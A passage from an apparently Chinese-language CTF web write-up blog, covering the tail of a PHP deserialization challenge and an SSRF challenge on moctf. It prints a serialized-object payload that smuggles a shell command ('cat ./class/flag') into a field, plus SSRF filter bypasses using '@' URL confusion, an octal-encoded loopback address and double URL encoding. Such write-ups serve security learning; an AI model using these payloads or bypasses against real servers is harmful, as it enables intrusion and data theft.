<p>payload：<br><code>O:7:&quot;sheldon&quot;:3:{s:3:&quot;bag&quot;;s:26:&quot;//win.php|cat ./class/flag&quot;;s:6:&quot;weapon&quot;;s:3:&quot;AWM&quot;;}</code><br>&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp&amp;nbsp↑<br>这里从2改成3以使反序列化失败</p>
<h2 id="网站检测器"><a href="#网站检测器" class="headerlink" title="网站检测器"></a>网站检测器</h2><p>一道SSRF的题，看到要和内网搞事就觉得是，但第一次做SSRF不会就查一下</p>
<p>这里利用的是解析URL产生的漏洞。后台会对我们输入的URL进行解析过滤，这时就可能会出现URL解析不当导致绕过过滤。当我们传入 地址1@地址2 ，后台进行URL解析时，会由于第一个地址后的参数为@被过滤掉，只解析第二个地址</p>
<p>于是尝试<br><code>http://www.moctf.com@127.0.0.1</code></p>
<p>提示不能有127，那就转进制<br>先把127.0.0.1转为16进制 7f 00 00 01，然后连起来7f000001转成8进制17700000001,最后在前面加个0就可以了</p>
<p>然后再尝试<br><code>http://www.moctf.com@017700000001</code></p>
<p>成功打开了index,那就猜测有flag.php</p>
<p>继续尝试<br><code>http://www.moctf.com@017700000001/flag.php</code></p>
<p>提示不能有.，这里猜测在后台调用url时还会再解码一次url，于是尝试双url编码绕过</p>
<p>最后尝试payload:<br><code>http://www.moctf.com@017700000001/flag%25%32%65php</code></p>
<p>获得flag</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/11/picoCTF2018-web-wp/" rel="next" title="picoCTF2018 web wp">
                <i class="fa fa-chevron-left"></i> picoCTF2018 web wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/12/adworld-web-wp/" rel="prev" title="adworld web wp">
                adworld web wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="http://shifeng-kaze.cn/blog/head/kotori.jpg" alt="shifeng_kaze">
            
              <p class="site-author-name" itemprop="name">shifeng_kaze</p>
              <p class="site-description motion-element" itemprop="description">～いらっしゃいません～</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://shifeng-kaze.cn/" title="shifeng-kaze" target="_blank">shifeng-kaze</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io" title="Aluvion" target="_blank">Aluvion</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一道水题"><span class="nav-number">1.</span> <span class="nav-text">一道水题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#还是水题"><span class="nav-number">2.</span> <span class="nav-text">还是水题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#访问限制"><span class="nav-number">3.</span> <span class="nav-text">访问限制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#机器蛇"><span class="nav-number">4.</span> <span class="nav-text">机器蛇</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP黑魔法"><span class="nav-number">5.</span> <span class="nav-text">PHP黑魔法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#我想要钱"><span class="nav-number">6.</span> <span class="nav-text">我想要钱</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#登录就对了"><span class="nav-number">7.</span> <span class="nav-text">登录就对了</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#文件包含"><span class="nav-number">8.</span> <span class="nav-text">文件包含</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#暴跳老板"><span class="nav-number">9.</span> <span class="nav-text">暴跳老板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Flag在哪？"><span class="nav-number">10.</span> <span class="nav-text">Flag在哪？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#美味的饼干"><span class="nav-number">11.</span> <span class="nav-text">美味的饼干</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#没时间解释了"><span class="nav-number">12.</span> <span class="nav-text">没时间解释了</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#死亡退出"><span class="nav-number">13.</span> <span class="nav-text">死亡退出</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#火眼金睛"><span class="nav-number">14.</span> <span class="nav-text">火眼金睛</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#unset"><span class="nav-number">15.</span> <span class="nav-text">unset</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PUBG"><span class="nav-number">16.</span> <span class="nav-text">PUBG</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#网站检测器"><span class="nav-number">17.</span> <span class="nav-text">网站检测器</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">shifeng_kaze</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
